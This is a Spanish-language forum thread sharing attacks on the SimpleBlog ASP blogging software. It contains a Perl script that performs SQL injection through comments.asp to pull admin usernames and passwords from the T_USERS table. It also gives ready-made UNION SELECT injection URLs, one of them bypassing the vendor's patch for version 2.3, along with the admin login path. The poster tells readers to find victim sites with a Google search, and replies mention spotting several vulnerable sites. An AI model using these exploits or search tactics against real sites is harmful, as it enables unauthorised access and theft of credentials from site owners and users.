Simpleblog es un sistema en ASP de "blogging". Este tiene varias vulnerabilidades. Búsquen en Google: "Powered by SimpleBlog 2.0". La versión 2.0 es una de las más xploitables.
Les pongo los xploits..
Simpleblog es un sistema en ASP de "blogging". Este tiene varias vulnerabilidades. Búsquen en Google: "Powered by SimpleBlog 2.0". La versión 2.0 es una de las más xploitables.
Les pongo los xploits..
Código:#!/usr/bin/perl #Traducido por pronX #Uso: el_exploit.pl <host> <ruta> <id> use IO::Socket; if(@ARGV != 3) { usage(); } else { exploit(); } sub header() { print " *****Exploit de inyección SQL en SimpleBlog 2.0***** \r\n"; print " *****Windows apesta!***** \r\n"; } sub usage() { header(); print " *Uso: $0 <host> <ruta> <id>\r\n"; print " *<host> = Host de la víctima ej: elblog.com\r\n"; print " *<ruta> = Ruta del SimpleBlog ej: /simpleblog/\r\n"; print " *<id> = ID del usuario ya sea admin o otro ej: 1\r\n"; exit(); } sub exploit () { $simserver = $ARGV[0]; $simserver =~ s/(http:\/\/)//eg; $simhost = "http://".$simserver; $simdir = $ARGV[1]; $simport = "80"; $simtar = "comments.asp?id="; $simsql = "-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS%20WHERE%20id%20like%20".$ARGV[2]; $simreq = $simhost.$simdir.$simtar.$simsql; header(); print "- Intentando de conectar: $simserver\r\n"; $sim = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$simserver", PeerPort => "$simport") || die "- Falló la conexión...\n"; print $sim "GET $simreq HTTP/1.1\n"; print $sim "Accept: */*\n"; print $sim "Referer: $simhost\n"; print $sim "Accept-Language: tr\n"; print $sim "User-Agent: Mozzilla\n"; print $sim "Cache-Control: no-cache\n"; print $sim "Host: $simserver\n"; print $sim "Connection: close\n\n"; print "Conectado...\r\n"; while ($answer = <$sim>) { if ($answer =~ /class=\"c_content\">(.*?)<\/td><\/tr>/) { if ($1 == $ARGV[2]) { print "Se ve vulnerable :)\r\n"; } else { die "- Falló el exploit\n"; } } if ($answer =~ /class=\"c_content\"><b>(.*)<\/b>/) { print "- Usuario: $1\r\n"; } if ($answer =~ /href=\"mailto:(.*?)\">(.*?)<\/a>/) { print "- Contraseña: $1\r\n"; } } }
Exploit de Inyección SQL en el SimpleBlog 2.0 <=, en el archivo "comments.asp".
Agradecimientos a: Chironex Fleckeri
Contacto: [email protected]
Búsquen en Google: Powered By SimpleBlog 2.0
--
http://www.objetivo.com/ruta_al_blog/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREAT ED,null,null FROM T_USERS WHERE id=1
--
Al panel de administración, lo podemos encontrar en:
--
http://www.objetivo.com/ruta_al_blog/admin/login.asp
--
PD: a mí solo me anduvo el Exploit 1, que es un script en Perl en los blogs que probé.
Exploit por: Vipsta y MurderSkillz
Nombre de la aplicación: SimpleBlog 2.3
Autor de la aplicación: 8pixel.net
Versión: <= 2.3
Tipo: Blog
-- Detalles --
Vulnerabilidad: Inyección SQL remota
Requerimientos: Base de datos con soporte para la instrucción UNION
Revisiones: Nota, esta es una revision de otra vulnerabilidad posteada por Chironex Fleckeri
--Código--
Los autores "implementaron" un parche para las vulnerabilidades de Inyección SQL, sin embargo esta mier** fue fácilmente estudiada por Vipsta y MurderSkillz.
Los autores intentaron remover los caracteres ilegales como ' y = que detienen las inyecciones sql. Sin embargo fallaron en eliminar el simbolo ">". jaja.
--Vamos al grano--
http://www.objetivo.com/ruta_al_blog/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSW ORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_ USERS%20WHERE%20id>1
--
jeje muy bueno está.
deve de ser un currazo todo esto.
porcierto, hay algun exploid q no hayas traducido tu?? xD
jaja, yo lo traduje todo. pero solo aquí en el foro para la comunidad. (-;
Pero están muy buenos. Ya vi varias webs vulnerables.
Marcadores